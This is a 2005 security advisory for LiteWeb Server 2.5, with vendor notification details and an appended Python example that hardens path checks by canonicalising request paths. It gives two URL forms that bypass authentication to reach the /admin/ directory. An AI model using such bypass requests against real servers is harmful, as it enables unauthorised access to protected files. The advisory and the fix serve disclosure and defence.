Author: gss_it@yahoo.com
Application: LiteWeb Server
Web Site: www.cmfperception.com
Versions: 2.5
Platform: Windows
Bug: An access control vulnerability.
Credits:
#########################################
#            == Ziv Kamir ==            #
#                                       #
#  GSSIT - Global Security Solution IT  #
#                                       #
#  Email : gss_it@yahoo.com             #
#                                       #
#  Web   : www.gssit.co.il              #
#                                       #
#########################################
---------------------
1) Introduction
2) Bug
3) The Code
4) Fix
================
1) Introduction
================
LiteWeb is a powerful web server that handles multiple domains
and supports PHP, Perl, MySQL, and much more.
=======
2) Bug
=======
A remote user may obtain password-protected files on the server without having to authenticate.
===========
3) The Code
===========
http://Target/\admin\/login.html
http://Target//admin//login.html
======
4) Fix
======
Date of Vendor Notification:
----------------------------
02/06/05
Response:
---------
02/06/05
It will be fixed in the next version.
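
Added example (not LiteWeb code and not from the advisory author): a path check that canonicalises the request before comparing it with the protected directory, so the two URL forms in section 3 are treated the same as /admin/login.html. It assumes the flaw is a comparison of the raw request path against the protected prefix; PROTECTED_PREFIXES and all function names are hypothetical.

```python
import posixpath
from urllib.parse import unquote

# Assumed protected directory, taken from the URLs in section 3.
PROTECTED_PREFIXES = ("/admin",)


def canonical_path(raw_path: str) -> str:
    """Reduce a request path to the one form the Windows file system resolves."""
    path = unquote(raw_path)          # decode %5c, %2f and similar, once only
    path = path.replace("\\", "/")    # Windows accepts "\" as a separator
    # normpath collapses repeated "/" and resolves "." and ".." segments;
    # strip leading slashes first because it preserves a leading "//".
    path = posixpath.normpath("/" + path.lstrip("/"))
    return path.lower()               # Windows file names are case-insensitive


def _matches(path: str) -> bool:
    return any(path == p or path.startswith(p + "/") for p in PROTECTED_PREFIXES)


def naive_is_protected(raw_path: str) -> bool:
    """Assumed flawed behaviour: the raw request path is compared as-is."""
    return _matches(raw_path)


def is_protected(raw_path: str) -> bool:
    """Hardened behaviour: compare only after canonicalisation."""
    return _matches(canonical_path(raw_path))


if __name__ == "__main__":
    # Constructed sample requests; the second and third use the forms from section 3.
    samples = [
        "/admin/login.html",
        "/\\admin\\/login.html",
        "//admin//login.html",
        "/%5Cadmin%5C/login.html",
        "/ADMIN/login.html",
        "/administrator/index.html",
        "/index.html",
    ]
    for s in samples:
        print(f"{s!r:32} naive={naive_is_protected(s)!s:5} "
              f"hardened={is_protected(s)!s:5} -> {canonical_path(s)}")
```

The authentication decision and the file lookup should both use the value returned by canonical_path, so that the path checked is the path served.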